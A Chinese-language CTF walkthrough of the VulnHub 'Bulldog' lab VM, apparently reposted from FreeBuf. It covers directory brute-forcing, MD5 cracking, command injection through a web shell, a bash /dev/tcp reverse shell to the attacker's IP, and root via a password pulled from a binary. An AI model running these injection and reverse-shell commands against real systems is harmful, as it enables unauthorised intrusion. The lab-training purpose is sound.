VulnHub靶机学习——BullDog实战记录
一,前言
作为一名渗透测试行业的菜鸟,一直没有找到好的靶场来进行练习,最近团队里的大佬推荐的Vnluhub(www.vulnhub.com),正好可以提供一个很好的渗透测试环境。于是从上面找了一个安装包比较小的,毕竟安装时间短(其实是毕竟难度不高)。好了,闲话少说,现在让我们开始吧。
二,运行说明
*靶机难度:初学者/中级
*目标:提权到root权限并查看flag
*攻击机:kali linux,IP地址172.16.111.14
*靶机:bulldog,IP地址172.16.111.90
(下载地址:https://download.vulnhub.com/bulldog/bulldog.ova)
*运行环境:kali运行在VMware中,靶机在Virtualbox中
在这里就不介绍虚拟机的安装方式了,但是要记得把攻击机和靶机的网络连接方式都改为桥接模式
准备工作做好了,接下来就开始吧
三,渗透过程
1,分别打开kali和bulldog
bulldog在开机时界面上已经有一个IP地址
这下方便了,直接在kali自带的的火狐浏览器中访问此地址看看有没有什么好的信息 点开中间的Public Notice链接
额。。。这两个页面好像都不能给我们提供什么有价值的信息
接下来查看一下网页源代码
依然没有什么好的提示。。。。
接下来爆破目录,看看有没有什么新发现
2,爆破目录
在kali中打开命令终端,输入
Dirb http://172.16.111.90
根据扫描结果,打开链接http://172.16.111.90/admin 这是一个登录界面,可是我们没有用户名和密码。难道要用burp爆破一下?等会再说,而且还有dirb里扫描出的一个链接没打开,现在先看看当前页面的源代码
没啥有用的,看看扫描出的另一链接 172.16.111.90/dev 怎么又全是英文介绍,不知道我英语学的不好的么。。。
算了,这么长的页面也懒得看,找彦宏哥的百度翻译一下
这算是发现了些有价值的信息,新的系统是用Django语言编写并且启用了SSH,完全删除了PHP。
页面中间还一个Web-Shell链接,点进去看下
一般来说web shell是能为我们所用的,但是现在提示与服务器进行身份验证才能使用web shell。那好吧,看看源代码
哎,发现有奇怪的东西混了进来。这不是MD5加密的信息么,去解密一下
找一个MD5解密网站,然后复制粘贴让我无语的MD5
。。。确实是让我无语的MD5,解密了四五条都是这样。但是在最后两个的时候,终于有了收获 bulldog和bulldoglover会不会就是用户名和密码呢,现在去刚开始的登录页面
分别用bulldog和bulldoglover轮流当做用户名和密码试了试,根本登不上去。不过话说这火狐浏览器确实是敬业,登录失败了还问我要不要保存登录信息。
这时候想起来在查看刚才页面的源代码时,MD5值前面好像有对应的用户名,用他们登陆试试
经过尝试之后果然成功了,不过用nick登进去好像没有什么可以为我们所用的功能
尝试用sarah登录一下,结果页面跟nick一样
现在我们找到了两组用户名和密码,记下来可能等会要用
nick—bulldog sarah—bulldoglover
这时候再打开172.168.111.90/dev页面,发现刚才的web shell能用了
不过好像只能用系统给出的几个命令。先试一下有没有命令注入
3,命令注入、shell反弹
在输入框里输入Ifconfig &whoami
根据反馈结果判断存在命令注入,那接下来就好办了。
在攻击机kali中打开命令终端开始监听,输入nc -lvnp 6666
尝试bash反弹,在靶机打开的网页命令框中输入
bash -i >& /dev/tcp/172.16.111.14 /6666 0>&1
结果。。。。。。。
emmm…好尴尬
换一种方式
尝试输入 ls &bash -i >& /dev/tcp/172.16.111.14 /6666 0>&1
服务器还是报错500。多次尝试之后,使用echo命令反弹shell成功
echo “bash -i >& /dev/tcp/172.16.111.14/6666 0>&1” | bash
接下来就是提权了
四,root提权、查看flag
首先查看有哪些系统用户,cat /etc/passwd。发现了一个重点对象:bulldogadmin
然后,查找他的文件 find / -user bulldogadmin 2>/dev/null
发现有hiddenadmindirectory隐藏目录,用less命令打开里面包含的文件看看
好吧,又是英文,复制下翻译去 同样的方式打开另一个文件查看一下
发现customPermissionApp里面包含的都是字符,输入命令
strings/home/bulldogadmin/.hiddenadmindirectory/customPermissionApp
查看此文件
虽然我英语不好,但是依然很轻松地看出文件中间有一个被 H 打断的PASSWORD单词。于是把前后字段去掉H,得到一句SUPERultimatePASSWORDyouCANTget 把它保存着,这可能是我们会要用到的密码
Su命令执行一下
su: must be run from a terminal 需要一个终端
好吧,触及到我的知识盲区了
上网查了一下资料,可以用python调用本地的shell,命令:
python -c ‘import pty;pty.spawn(“/bin/bash”)’
然后执行命令 sudo su – ,输入刚才记下来的的密码试一下,结果成功获得root权限,拿到flag
输入ls命令,发现里面只有一个文本文档
输入 cat congrats.txt 打开看下
五,经验总结
首先要爆破出admin和dev页面,利用解密MD5得到的密码登录进系统。然后绕过bulldog的系统限制,反弹shell到kali。当然最重要的是root提权,这方面我做的不够好,有些命令不懂,还要去查的网上的资料。Shell反弹和对于linux系统命令掌握的还是太少,以后要多学习,多记。总之,在渗透测试上还有很长的路要走。
Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,目前聚集了十多位专业的安全攻防技术研究人员,专注于网络攻防、Web安全、移动终端、安全开发、IoT/物联网/工控安全等方向。
想了解更多Tide安全团队,请关注团队官网: http://www.TideSec.net 或关注公众号
来源:freebuf.com 2019-04-04 11:44:37 by: 你伤不到我哒
请登录后发表评论
注册